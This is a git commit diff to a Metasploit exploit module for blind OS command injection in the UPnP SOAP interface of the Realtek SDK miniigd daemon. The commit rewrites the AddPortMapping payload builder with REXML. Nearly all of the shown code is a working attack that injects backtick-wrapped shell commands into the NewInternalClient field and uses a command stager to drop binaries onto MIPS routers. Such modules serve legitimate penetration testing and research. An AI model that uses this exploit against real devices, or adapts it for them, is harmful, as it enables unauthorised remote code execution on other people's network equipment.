Use REXML

jvazquez-r7 · jvazquez-r7 · commit 9ebd6e5d6e57 · 2015-05-29T13:27:19.000-05:00
diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -10,15 +10,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
       'Description' => %q{
         Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
         injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
-        there is no output for the executed command.
-        This module has been tested in emulation on a Trendnet TEW-731BR router.
+        there is no output for the executed command. This module has been tested successfully on a
+        Trendnet TEW-731BR router with emulation.
       },
       'Author'      =>
         [
@@ -52,7 +53,7 @@ def initialize(info = {})
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
             }
-          ],
+          ]
         ],
       'DefaultTarget'    => 0
       ))
@@ -91,54 +92,76 @@ def exploit
 
     execute_cmdstager(
       :flavor  => :echo,
-      :linemax => 50
+      :linemax => 50,
+      :nodelete => true
     )
   end
 
   def execute_command(cmd, opts)
     uri = '/wanipcn.xml'
-
-    new_portmapping_descr = rand_text_alpha(8)
-    new_external_port = rand(32767) + 32768
-    new_internal_port = rand(32767) + 32768
-
-    # We need something like this:
-    #cmd = "echo -en \\\x7f\\\x45\\\x4c\\\x46\\\x01  > /var/tmp/pwdn"
-    cmd = cmd.gsub("\\\\", "\\\\\\\\\\")
-
-    soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
-
-    data_cmd = "<?xml version=\"1.0\"?>"
-    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
-    data_cmd << "<SOAP-ENV:Body>"
-    data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-    data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
-    data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
-    data_cmd << "<NewEnabled>1</NewEnabled>"
-    data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
-    data_cmd << "<NewRemoteHost></NewRemoteHost>"
-    data_cmd << "<NewProtocol>TCP</NewProtocol>"
-    data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
-    data_cmd << "</m:AddPortMapping>"
-    data_cmd << "</SOAP-ENV:Body>"
-    data_cmd << "</SOAP-ENV:Envelope>"
+    soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
+    data_cmd = '<?xml version="1.0"?>' + build_soap_req
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'vars_get' => {
           'service' => 'WANIPConn1'
         },
-        'ctype' => "text/xml",
+        'ctype' => 'text/xml',
         'method' => 'POST',
         'headers' => {
-          'SOAPAction' => soapaction,
+          'SOAPAction' => soap_action
           },
-        'data' => data_cmd
+        'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
       })
       return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
+
+  def build_soap_req
+    new_external_port = rand(32767) + 32768
+    new_internal_port = rand(32767) + 32768
+
+    xml = Document.new
+
+    xml.add_element(
+      'SOAP-ENV:Envelope',
+      {
+        'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
+        'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
+      })
+
+    xml.root.add_element('SOAP-ENV:Body')
+
+    body = xml.root.elements[1]
+
+    body.add_element(
+      'm:AddPortMapping',
+      {
+        'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
+      })
+
+    port_mapping = body.elements[1]
+    port_mapping.add_element('NewLeaseDuration')
+    port_mapping.add_element('NewInternalClient')
+    port_mapping.add_element('NewEnabled')
+    port_mapping.add_element('NewExternalPort')
+    port_mapping.add_element('NewRemoteHost')
+    port_mapping.add_element('NewProtocol')
+    port_mapping.add_element('NewInternalPort')
+
+    port_mapping.elements['NewLeaseDuration'].text  = ''
+    port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
+    port_mapping.elements['NewEnabled'].text        = '1'
+    port_mapping.elements['NewExternalPort'].text   = "#{new_external_port}"
+    port_mapping.elements['NewRemoteHost'].text     = ''
+    port_mapping.elements['NewProtocol'].text       = 'TCP'
+    port_mapping.elements['NewInternalPort'].text   = "#{new_internal_port}"
+
+    xml.to_s
+  end
+
 end
